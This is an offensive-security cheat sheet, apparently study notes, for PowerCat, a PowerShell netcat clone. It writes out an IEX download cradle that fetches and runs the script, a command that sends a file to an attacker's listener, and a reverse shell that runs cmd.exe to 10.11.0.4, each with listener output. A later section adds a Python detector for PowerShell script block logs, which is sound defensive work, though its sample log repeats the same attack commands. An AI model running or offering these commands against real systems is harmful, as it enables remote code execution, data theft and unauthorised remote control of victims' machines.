🐈 PowerCat

PowerShell version of Netcat written by besimorhino

Installation

PowerShell

Load The Function From Downloaded .ps1

. .\powercat.ps1

Load The Function From URL (PS)

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

Note:

  • Scripts loaded this way are only available in the current PowerShell instance and must be reloaded each time PowerShell is restarted.

Kali

Installation (Kali)

apt install powercat
  • Path: /usr/share/windows-resources/powercat

File Transfer

Netcat Listener (attacker)

Code

sudo nc -lnvp <port> > receiving_powercat.ps1

Example

kali@kali:~$ sudo nc -lnvp 443 > receiving_powercat.ps1
listening on [any] 443 ...
connect to [10.11.0.4] from (UNKNOWN) [10.11.0.22] 63661

Powercat (victim)

Code

powercat -c <attacker_ip> -p <port> -i C:\<path>\powercat.ps1

Example

PS C:\Users\Offsec> powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1
  • -c: specifies client mode and sets the IP address of the listener to connect to

  • -p: specifies the port number

  • -i: indicates the local file that will be transferred remotely

Reverse Shell

Netcat Listener (attacker)

Code

sudo nc -lnvp <port>

Example

kali@kali:~$ sudo nc -lvp 443
listening on [any] 443 ...

Powercat (victim)

Code

powercat -c <attacker_ip> -p <port> -e <application>

Example

PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe
  • -c: specifies client mode and sets the IP address of the listener to connect to

  • -e: specifies the application to execute
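
From the defender's side, the download cradle, the file transfer and the shell invocation shown above all leave recognisable text in PowerShell script block logs (Event ID 4104). The following is an added example, not part of powercat or of the original page: it classifies logged command text by the flags documented here. The names `classify`, `scan` and `SAMPLE_LOG` are hypothetical, and the sample lines are constructed from the commands on this page.

```python
import re

# Flags as documented on this page; PowerShell parameter names are case-insensitive.
FLAGS = {"-c": "remote_ip", "-p": "port", "-i": "input_file", "-e": "execute"}
CRADLE = re.compile(
    r"\bIEX\b.*?DownloadString\(\s*['\"]([^'\"]*powercat[^'\"]*)['\"]", re.I | re.S)
INVOKE = re.compile(r"(?:^|[\s;|&({])powercat\s+(.*)", re.I | re.S)
ARG = re.compile(r"(?<!\S)(-[cpie])\s+(\"[^\"]*\"|'[^']*'|\S+)", re.I)


def classify(script_text):
    """Classify one logged PowerShell command; return None when nothing matches."""
    cradle = CRADLE.search(script_text)
    if cradle:
        return {"kind": "download_cradle", "url": cradle.group(1)}
    call = INVOKE.search(script_text)
    if not call:
        return None
    # Map each documented flag to a named field, dropping surrounding quotes.
    finding = {FLAGS[f.lower()]: v.strip("'\"") for f, v in ARG.findall(call.group(1))}
    if "execute" in finding:
        finding["kind"] = "shell_over_network"
    elif "input_file" in finding:
        finding["kind"] = "file_sent_over_network"
    else:
        finding["kind"] = "powercat_invocation"
    return finding


def scan(lines):
    """Return (line_number, finding) pairs for every line that matches."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := classify(line))]


# Constructed script block text, modelled on the commands shown on this page.
SAMPLE_LOG = [
    r"Get-ChildItem C:\Users\Offsec",
    "IEX (New-Object System.Net.Webclient).DownloadString("
    "'https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')",
    r"powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1",
    "powercat -c 10.11.0.4 -p 443 -e cmd.exe",
    "Get-Help about_Execution_Policies",
]

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(number, finding)
```

String matching on the function name is a first-pass filter; correlate hits with outbound connection telemetry for powershell.exe to the extracted address and port.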

Powercat Bind Shells

To read more about it, see the note below.

Note:

  • PDF page 93

Powercat Stand-Alone Payloads

To read more about it, see the note below.

Note:

  • PDF page 93
